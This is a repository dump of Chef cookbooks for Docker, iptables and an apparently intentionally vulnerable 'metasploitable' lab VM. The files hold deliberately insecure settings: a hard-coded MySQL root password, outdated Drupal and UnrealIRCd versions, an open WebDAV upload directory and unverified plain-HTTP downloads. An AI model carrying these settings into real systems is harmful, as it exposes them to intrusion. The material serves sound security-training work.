25 | # Only systemd 226 and above support this version. 26 | TasksMax=infinity 27 | TimeoutStartSec=0 28 | # set delegate yes so that systemd does not reset the cgroups of docker containers 29 | Delegate=yes 30 | # kill only the docker process, not all processes in the cgroup 31 | KillMode=process 32 | # restart the docker process if it exits prematurely 33 | Restart=on-failure 34 | StartLimitBurst=3 35 | StartLimitInterval=60s 36 | 37 | [Install] 38 | WantedBy=multi-user.target 39 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.socket-override.erb: --------------------------------------------------------------------------------
<%# Socket unit for the Docker API, rendered with caller-supplied extra settings. %>
[Unit]
Description=Docker Socket for the API
PartOf=<%= @docker_name %>.service

[Socket]
ListenStream=<%= @docker_socket %>
<%# NOTE(review): unlike docker.socket.erb, this template sets no SocketMode or
    SocketUser of its own. systemd's default SocketMode is 0666, and write
    access to the Docker socket amounts to control of the daemon, so confirm
    that @systemd_socket_args always supplies a restrictive mode and owner. %>
SocketGroup=<%= @config.group %>
<%= @systemd_socket_args %>

[Install]
WantedBy=sockets.target
-------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/docker.socket.erb: --------------------------------------------------------------------------------
<%# Socket unit for the Docker API with fixed ownership and mode. %>
[Unit]
Description=Docker Socket for the API
PartOf=<%= @docker_name %>.service

[Socket]
ListenStream=<%= @docker_socket %>
<%# Mode 0660, owner root, group from @config.group: only root and members of
    that group can connect, so membership of the group grants access to the
    Docker API. %>
SocketMode=0660
SocketUser=root
SocketGroup=<%= @config.group %>

[Install]
WantedBy=sockets.target
-------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/systemd/tmpfiles.d.conf.erb: -------------------------------------------------------------------------------- 1 | d /var/run/docker 0755 root <%= @config.group || 'root' %> - 2 | -------------------------------------------------------------------------------- /chef/cookbooks/docker/templates/default/upstart/docker.conf.erb: 
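--------------------------------------------------------------------------------
# Upstart job for the Docker daemon: mounts the cgroup hierarchy if needed,
# starts the daemon, then waits for it to become ready.
description "Docker daemon"

start on (filesystem and net-device-up IFACE!=lo)
stop on runlevel [!2345]
limit nofile 524288 1048576
limit nproc 524288 1048576

respawn

kill timeout 20

pre-start script
  # Nothing to do when fstab already mentions cgroup, or when the kernel
  # exposes no /proc/cgroups or /sys/fs/cgroup.
  # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount
  if grep -v '^#' /etc/fstab | grep -q cgroup \
    || [ ! -e /proc/cgroups ] \
    || [ ! -d /sys/fs/cgroup ]; then
    exit 0
  fi
  if ! mountpoint -q /sys/fs/cgroup; then
    mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup
  fi
  (
    cd /sys/fs/cgroup
    # The command substitution is left unquoted on purpose: it is split into
    # one word per enabled subsystem (column 4 of /proc/cgroups equal to 1).
    for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do
      # Each use of the name is quoted so it is always passed as one argument.
      mkdir -p "$sys"
      if ! mountpoint -q "$sys"; then
        if ! mount -n -t cgroup -o "$sys" cgroup "$sys"; then
          rmdir "$sys" || true
        fi
      fi
    done
  )
end script

script
  # modify these in /etc/default/$UPSTART_JOB (/etc/default/docker)
  # The file is sourced as shell code by this job, so it should be writable
  # only by trusted administrators.
  if [ -f "/etc/default/$UPSTART_JOB" ]; then
    . "/etc/default/$UPSTART_JOB"
  fi
  exec <%= @docker_daemon_cmd %> <%= @docker_raw_logs_arg %>
end script

post-start script
  # Run the readiness check and report the result for the configured socket.
  <%= @docker_wait_ready %>
  if [ $? -eq 0 ]; then
    echo "<%= @docker_socket %> is up"
  else
    echo "<%= @docker_socket %> failed to start"
    exit 1
  fi
end script
-------------------------------------------------------------------------------- /chef/cookbooks/iptables/attributes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: iptables 3 | # Attribute:: default 4 | # 5 | # Copyright:: 2016, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 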
9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | default['iptables']['iptables_sysconfig'] = { 21 | 'IPTABLES_MODULES' => '', 22 | 'IPTABLES_MODULES_UNLOAD' => 'yes', 23 | 'IPTABLES_SAVE_ON_STOP' => 'no', 24 | 'IPTABLES_SAVE_ON_RESTART' => 'no', 25 | 'IPTABLES_SAVE_COUNTER' => 'no', 26 | 'IPTABLES_STATUS_NUMERIC' => 'yes', 27 | 'IPTABLES_STATUS_VERBOSE' => 'no', 28 | 'IPTABLES_STATUS_LINENUMBERS' => 'yes', 29 | } 30 | default['iptables']['ip6tables_sysconfig'] = { 31 | 'IP6TABLES_MODULES' => '', 32 | 'IP6TABLES_MODULES_UNLOAD' => 'yes', 33 | 'IP6TABLES_SAVE_ON_STOP' => 'no', 34 | 'IP6TABLES_SAVE_ON_RESTART' => 'no', 35 | 'IP6TABLES_SAVE_COUNTER' => 'no', 36 | 'IP6TABLES_STATUS_NUMERIC' => 'yes', 37 | 'IP6TABLES_STATUS_VERBOSE' => 'no', 38 | 'IP6TABLES_STATUS_LINENUMBERS' => 'yes', 39 | } 40 | 41 | default['iptables']['system_ruby'] = '/usr/bin/ruby' 42 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/recipes/_package.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: iptables 3 | # Recipe:: _package 4 | # 5 | # Copyright:: 2008-2016, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 
9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | # amazon linux, any fedora, and amazon linux 2 21 | if (platform_family?('rhel') && node['platform_version'].to_i == 7) || 22 | (platform_family?('amazon') && node['platform_version'].to_i < 2013) || 23 | platform_family?('fedora') 24 | package 'iptables-services' 25 | else 26 | package 'iptables' 27 | if platform_family?('debian') 28 | # Since Ubuntu 10.04LTS and Debian6, this package takes over the automatic loading of the saved iptables rules 29 | package 'iptables-persistent' 30 | end 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/resources/rule6.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Author:: Julien 'Lta' BALLET 3 | # Cookbook:: iptables 4 | # Resource:: rule6 5 | # 6 | # Copyright:: 2018, Chef Software, Inc. 7 | # 8 | # Licensed under the Apache License, Version 2.0 (the "License"); 9 | # you may not use this file except in compliance with the License. 10 | # You may obtain a copy of the License at 11 | # 12 | # http://www.apache.org/licenses/LICENSE-2.0 13 | # 14 | # Unless required by applicable law or agreed to in writing, software 15 | # distributed under the License is distributed on an "AS IS" BASIS, 16 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 17 | # See the License for the specific language governing permissions and 18 | # limitations under the License. 
19 | 20 | property :source, String 21 | property :cookbook, String 22 | property :variables, Hash, default: {} 23 | property :lines, String 24 | property :table, Symbol 25 | property :filemode, [String, Integer], default: '0644' 26 | 27 | action :enable do 28 | iptables_rule new_resource.name do 29 | ipv6 true 30 | source new_resource.source 31 | cookbook new_resource.cookbook 32 | variables new_resource.variables 33 | lines new_resource.lines 34 | table new_resource.table 35 | sensitive new_resource.sensitive 36 | filemode new_resource.filemode 37 | action :enable 38 | end 39 | end 40 | 41 | action :disable do 42 | iptables_rule new_resource.name do 43 | ipv6 true 44 | source new_resource.source 45 | cookbook new_resource.cookbook 46 | variables new_resource.variables 47 | lines new_resource.lines 48 | table new_resource.table 49 | sensitive new_resource.sensitive 50 | filemode new_resource.filemode 51 | action :disable 52 | end 53 | end 54 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/templates/default/iptables-config.erb: -------------------------------------------------------------------------------- 1 | # This file managed by Chef. 
Do not hand edit 2 | <% @config.each do |k,v| -%> 3 | <%= k %>="<%= v %>" 4 | <% end -%> 5 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/templates/default/iptables_load.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | <%= @iptables_restore_binary %> < <%= @iptables_save_file %> 3 | exit 0 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/.kitchen.yml: -------------------------------------------------------------------------------- 1 | --- 2 | driver: 3 | name: vagrant 4 | synced_folders: 5 | - [<%= File.join(ENV['PWD'], '..', '..')%>, '/tmp/repo-data'] 6 | 7 | provisioner: 8 | name: chef_zero 9 | encrypted_data_bag_secret_key_path: 'secrets/fakey-mcfakerton' 10 | data_bags_path: './data_bags' 11 | 12 | platforms: 13 | - name: ubuntu-16.04 14 | - name: centos-7.2 15 | 16 | suites: 17 | - name: default 18 | run_list: 19 | - recipe[delivery_build::default] 20 | - recipe[test] 21 | attributes: 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/Berksfile: -------------------------------------------------------------------------------- 1 | source 'https://supermarket.chef.io' 2 | 3 | metadata 4 | 5 | group :delivery do 6 | cookbook 'delivery_build', git: 'https://github.com/chef-cookbooks/delivery_build' 7 | cookbook 'delivery-base', git: 'https://github.com/chef-cookbooks/delivery-base' 8 | cookbook 'test', path: './test/fixtures/cookbooks/test' 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2017 The Authors 2 | 3 | All rights reserved, do not redistribute. 
4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/chefignore: -------------------------------------------------------------------------------- 1 | # Put files/directories that should be ignored in this file when uploading 2 | # to a chef-server or supermarket. 3 | # Lines that start with '# ' are comments. 4 | 5 | # OS generated files # 6 | ###################### 7 | .DS_Store 8 | Icon? 9 | nohup.out 10 | ehthumbs.db 11 | Thumbs.db 12 | 13 | # SASS # 14 | ######## 15 | .sass-cache 16 | 17 | # EDITORS # 18 | ########### 19 | \#* 20 | .#* 21 | *~ 22 | *.sw[a-z] 23 | *.bak 24 | REVISION 25 | TAGS* 26 | tmtags 27 | *_flymake.* 28 | *_flymake 29 | *.tmproj 30 | .project 31 | .settings 32 | mkmf.log 33 | 34 | ## COMPILED ## 35 | ############## 36 | a.out 37 | *.o 38 | *.pyc 39 | *.so 40 | *.com 41 | *.class 42 | *.dll 43 | *.exe 44 | */rdoc/ 45 | 46 | # Testing # 47 | ########### 48 | .watchr 49 | .rspec 50 | spec/* 51 | spec/fixtures/* 52 | test/* 53 | features/* 54 | examples/* 55 | Guardfile 56 | Procfile 57 | .kitchen* 58 | .rubocop.yml 59 | spec/* 60 | Rakefile 61 | .travis.yml 62 | .foodcritic 63 | .codeclimate.yml 64 | 65 | # SCM # 66 | ####### 67 | .git 68 | */.git 69 | .gitignore 70 | .gitmodules 71 | .gitconfig 72 | .gitattributes 73 | .svn 74 | */.bzr/* 75 | */.hg/* 76 | */.svn/* 77 | 78 | # Berkshelf # 79 | ############# 80 | Berksfile 81 | Berksfile.lock 82 | cookbooks/* 83 | tmp 84 | 85 | # Policyfile # 86 | ############## 87 | Policyfile.rb 88 | Policyfile.lock.json 89 | 90 | # Cookbooks # 91 | ############# 92 | CONTRIBUTING* 93 | CHANGELOG* 94 | TESTING* 95 | MAINTAINERS.toml 96 | 97 | # Strainer # 98 | ############ 99 | Colanderfile 100 | Strainerfile 101 | .colander 102 | .strainer 103 | 104 | # Vagrant # 105 | ########### 106 | .vagrant 107 | Vagrantfile 108 | -------------------------------------------------------------------------------- 
/chef/cookbooks/metasploitable/.delivery/build_cookbook/data_bags/keys/delivery_builder_keys.json: -------------------------------------------------------------------------------- 1 | {"id": "delivery_builder_keys"} -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'build_cookbook' 2 | maintainer 'The Authors' 3 | maintainer_email 'you@example.com' 4 | license 'all_rights' 5 | version '0.1.0' 6 | 7 | depends 'delivery-truck' 8 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::default' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/deploy.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: deploy 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::deploy' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/functional.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: functional 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 
6 | include_recipe 'delivery-truck::functional' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/lint.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: lint 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::lint' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/provision.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: provision 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::provision' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/publish.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: publish 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::publish' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/quality.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: quality 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 
6 | include_recipe 'delivery-truck::quality' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/security.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: security 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::security' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/smoke.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: smoke 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::smoke' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/syntax.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: syntax 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::syntax' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/unit.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: unit 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 
6 | include_recipe 'delivery-truck::unit' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/secrets/fakey-mcfakerton: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/.delivery/build_cookbook/secrets/fakey-mcfakerton -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/test/fixtures/cookbooks/test/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'test' 2 | version '0.1.0' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/test/fixtures/cookbooks/test/recipes/default.rb: -------------------------------------------------------------------------------- 1 | %w(unit lint syntax).each do |phase| 2 | # TODO: This works on Linux/Unix. Not Windows. 
3 | execute "HOME=/home/vagrant delivery job verify #{phase} --server localhost --ent test --org kitchen" do 4 | cwd '/tmp/repo-data' 5 | user 'vagrant' 6 | end 7 | end 8 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2", 3 | "build_cookbook": { 4 | "name": "build_cookbook", 5 | "path": ".delivery/build_cookbook" 6 | }, 7 | "skip_phases": [], 8 | "job_dispatch": { 9 | "version": "v2" 10 | }, 11 | "dependencies": [] 12 | } 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/project.toml: -------------------------------------------------------------------------------- 1 | # Delivery Prototype for Local Phases Execution 2 | # 3 | # The purpose of this file is to prototype a new way to execute 4 | # phases locally on your workstation. The delivery-cli will read 5 | # this file and execute the command(s) that are configured for 6 | # each phase. You can customize them by just modifying the phase 7 | # key on this file. 8 | # 9 | # By default these phases are configured for Cookbook Workflow only 10 | # 11 | # As this is still a prototype we are not modifying the current 12 | # config.json file and it will continue working as usual. 13 | 14 | [local_phases] 15 | unit = "chef exec rspec spec/" 16 | lint = "chef exec cookstyle" 17 | # Foodcritic includes rules only appropriate for community cookbooks 18 | # uploaded to Supermarket. We turn off any rules tagged "supermarket" 19 | # by default. If you plan to share this cookbook you should remove 20 | # '-t ~supermarket' below to enable supermarket rules. 21 | syntax = "chef exec foodcritic . 
--exclude spec -f any -t ~supermarket" 22 | provision = "chef exec kitchen create" 23 | deploy = "chef exec kitchen converge" 24 | smoke = "chef exec kitchen verify" 25 | # The functional phase is optional, you can define it by uncommenting 26 | # the line below and running the command: `delivery local functional` 27 | # functional = "" 28 | cleanup = "chef exec kitchen destroy" 29 | 30 | # Remote project.toml file 31 | # 32 | # Specify a remote URI location for the `project.toml` file. 33 | # This is useful for teams that wish to centrally manage the behavior 34 | # of the `delivery local` command across many different projects. 35 | # 36 | # remote_file = "https://url/project.toml" 37 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.gitignore: -------------------------------------------------------------------------------- 1 | .vagrant 2 | *~ 3 | *# 4 | .#* 5 | \#*# 6 | .*.sw[a-z] 7 | *.un~ 8 | 9 | # Bundler 10 | Gemfile.lock 11 | bin/* 12 | .bundle/* 13 | 14 | # test kitchen 15 | .kitchen/ 16 | .kitchen.local.yml 17 | 18 | # Chef 19 | Berksfile.lock 20 | .zero-knife.rb 21 | Policyfile.lock.json 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.kitchen.yml: -------------------------------------------------------------------------------- 1 | --- 2 | driver: 3 | name: vagrant 4 | 5 | provisioner: 6 | name: chef_zero 7 | # You may wish to disable always updating cookbooks in CI or other testing environments. 
8 | # For example: 9 | # always_update_cookbooks: <%= !ENV['CI'] %> 10 | always_update_cookbooks: true 11 | 12 | verifier: 13 | name: inspec 14 | 15 | platforms: 16 | - name: ubuntu-16.04 17 | - name: centos-7.2 18 | 19 | suites: 20 | - name: default 21 | run_list: 22 | - recipe[metasploitable::default] 23 | verifier: 24 | inspec_tests: 25 | - test/smoke/default 26 | attributes: 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/Berksfile: -------------------------------------------------------------------------------- 1 | source 'https://supermarket.chef.io' 2 | 3 | metadata 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/README.md: -------------------------------------------------------------------------------- 1 | # metasploitable 2 | 3 | TODO: Enter the cookbook description here. 4 | 5 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/apache_continuum.rb: -------------------------------------------------------------------------------- 1 | default[:apache_continuum][:install_dir] = '/opt/apache_continuum' 2 | default[:apache_continuum][:download_url] = 'http://archive.apache.org/dist/continuum/binaries' 3 | default[:apache_continuum][:tar] = 'apache-continuum-1.4.2-bin.tar.gz' 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Attributes:: default 4 | # 5 | default[:metasploitable][:docker_users] = ['boba_fett', 6 | 'jabba_hutt', 7 | 'greedo', 8 | 'chewbacca',] 9 | 10 | default[:metasploitable][:files_path] = '/vagrant/chef/cookbooks/metasploitable/files/' -------------------------------------------------------------------------------- 
/chef/cookbooks/metasploitable/attributes/drupal.rb:
--------------------------------------------------------------------------------
1 | default[:drupal][:files_path] = File.join(default[:metasploitable][:files_path], 'drupal') # 'drupal' subdirectory of the cookbook-wide files_path
2 | default[:drupal][:install_dir] = '/var/www/html/drupal'
3 | default[:drupal][:sites_dir] = File.join(default[:drupal][:install_dir], 'sites')
4 | default[:drupal][:all_site_dir] = File.join(default[:drupal][:sites_dir], 'all')
5 | default[:drupal][:default_site_dir] = File.join(default[:drupal][:sites_dir], 'default')
6 | default[:drupal][:version] = '7.5' # fixed release string; NOTE(review): presumably combined with download_url by the drupal recipe - confirm
7 | default[:drupal][:download_url] = 'https://ftp.drupal.org/files/projects'
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/attributes/flags.rb:
--------------------------------------------------------------------------------
1 | #
2 | # Cookbook:: metasploitable
3 | # Attributes:: flags
4 | #
5 |
6 | default[:flags][:five_of_diamonds][:vuln_service] = 'custom_http' # name of the lab's flag service
7 | default[:flags][:five_of_diamonds][:vuln_port] = '8989' # port, stored as a string
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/attributes/mysql.rb:
--------------------------------------------------------------------------------
1 | default[:mysql][:root_password] = 'sploitme' # hard-coded root password committed in plain text: tolerable only because this cookbook builds a deliberately vulnerable lab VM; never carry it over to a host that is reachable outside an isolated lab network
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/attributes/php545.rb:
--------------------------------------------------------------------------------
1 | default[:php545][:download_url] = 'http://museum.php.net/php5/' # plain-HTTP origin: nothing protects the download in transit; NOTE(review): confirm the recipe verifies a checksum of what it fetches
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/attributes/proftpd.rb:
--------------------------------------------------------------------------------
1 | default[:proftpd][:download_url] = 'ftp://ftp.proftpd.org/distrib/source' # plain-FTP origin, same caveat: NOTE(review): confirm the recipe verifies a checksum of what it fetches
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/attributes/unrealircd.rb:
--------------------------------------------------------------------------------
1 | default[:unrealircd][:files_path] = File.join(default[:metasploitable][:files_path], 'drupal') # NOTE(review): joins 'drupal', the same value [:drupal][:files_path] uses - looks like a copy-paste slip; confirm whether 'unrealircd' was intended
2 | default[:unrealircd][:install_dir] = '/opt/unrealircd'
3 | default[:unrealircd][:download_url] = 'https://www.exploit-db.com/apps' # NOTE(review): third-party archive host; confirm the recipe pins the expected archive by checksum
--------------------------------------------------------------------------------
/chef/cookbooks/metasploitable/chefignore:
--------------------------------------------------------------------------------
1 | # Put files/directories that should be ignored in this file when uploading
2 | # to a chef-server or supermarket.
3 | # Lines that start with '# ' are comments.
4 |
5 | # OS generated files #
6 | ######################
7 | .DS_Store
8 | Icon?
9 | nohup.out
10 | ehthumbs.db
11 | Thumbs.db
12 |
13 | # SASS #
14 | ########
15 | .sass-cache
16 |
17 | # EDITORS #
18 | ###########
19 | \#*
20 | .#*
21 | *~
22 | *.sw[a-z]
23 | *.bak
24 | REVISION
25 | TAGS*
26 | tmtags
27 | *_flymake.*
28 | *_flymake
29 | *.tmproj
30 | .project
31 | .settings
32 | mkmf.log
33 |
34 | ## COMPILED ##
35 | ##############
36 | a.out
37 | *.o
38 | *.pyc
39 | *.so
40 | *.com
41 | *.class
42 | *.dll
43 | *.exe
44 | */rdoc/
45 |
46 | # Testing #
47 | ###########
48 | .watchr
49 | .rspec
50 | spec/*
51 | spec/fixtures/*
52 | test/*
53 | features/*
54 | examples/*
55 | Guardfile
56 | Procfile
57 | .kitchen*
58 | .rubocop.yml
59 | spec/*
60 | Rakefile
61 | .travis.yml
62 | .foodcritic
63 | .codeclimate.yml
64 |
65 | # SCM #
66 | #######
67 | .git
68 | */.git
69 | .gitignore
70 | .gitmodules
71 | .gitconfig
72 | .gitattributes
73 | .svn
74 | */.bzr/*
75 | */.hg/*
76 | */.svn/*
77 |
78 | # Berkshelf #
79 | #############
80 | Berksfile
81 | Berksfile.lock
82 | cookbooks/*
83 | tmp
84 |
85 | # Policyfile #
86 | ##############
87 | Policyfile.rb
88 |
Policyfile.lock.json 89 | 90 | # Cookbooks # 91 | ############# 92 | CONTRIBUTING* 93 | CHANGELOG* 94 | TESTING* 95 | MAINTAINERS.toml 96 | 97 | # Strainer # 98 | ############ 99 | Colanderfile 100 | Strainerfile 101 | .colander 102 | .strainer 103 | 104 | # Vagrant # 105 | ########### 106 | .vagrant 107 | Vagrantfile 108 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/cgi-bin.conf: -------------------------------------------------------------------------------- 1 | 2 | 3 | Define ENABLE_CGI_BIN 4 | 5 | 6 | 7 | Define ENABLE_CGI_BIN 8 | 9 | 10 | 11 | ScriptAlias /cgi-bin/ /var/www/cgi-bin/ 12 | 13 | AllowOverride None 14 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch 15 | Order allow,deny 16 | Allow from all 17 | 18 | 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/dav.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Distributed authoring and versioning (WebDAV) 3 | # 4 | # Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias 5 | # mod_auth_digest, mod_authn_file 6 | # 7 | 8 | # The following example gives DAV write access to a directory called 9 | # "uploads" under the ServerRoot directory. 10 | # 11 | # The User/Group specified in httpd.conf needs to have write permissions 12 | # on the directory where the DavLockDB is placed and on any directory where 13 | # "Dav On" is specified. 14 | 15 | Alias /uploads "/var/www/uploads" 16 | 17 | 18 | AllowOverride All 19 | Dav On 20 | 21 | 22 | Order Allow,Deny 23 | Allow from all 24 | 25 | 26 | 27 | # 28 | # The following directives disable redirects on non-GET requests for 29 | # a directory that does not include the trailing slash. This fixes a 30 | # problem with several clients that do not appropriately handle 31 | # redirects for folders with DAV methods. 
32 | # 33 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 34 | BrowserMatch "MS FrontPage" redirect-carefully 35 | BrowserMatch "^WebDrive" redirect-carefully 36 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 37 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 38 | BrowserMatch "^XML Spy" redirect-carefully 39 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/hello_world.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | printf "Content-type: text/html\n\n" 3 | printf "Hello World!\n" -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/php5.conf: -------------------------------------------------------------------------------- 1 | 2 | SetHandler application/x-httpd-php 3 | 4 | 5 | SetHandler application/x-httpd-php-source 6 | Order Deny,Allow 7 | Deny from all 8 | 9 | 10 | Order Deny,Allow 11 | Deny from all 12 | 13 | 14 | 15 | php_admin_flag engine Off 16 | 17 | 18 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/php5.load: -------------------------------------------------------------------------------- 1 | LoadModule php5_module /usr/lib/apache2/modules/libphp5.so 2 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache_continuum/data.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/apache_continuum/data.tar.gz -------------------------------------------------------------------------------- 
/chef/cookbooks/metasploitable/files/chatbot/chatbot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/chatbot/chatbot.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/drupal/default_site.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/drupal/default_site.tar.gz -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/10_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/10_of_clubs.wav -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/2_of_spades.pcapng: -------------------------------------------------------------------------------- 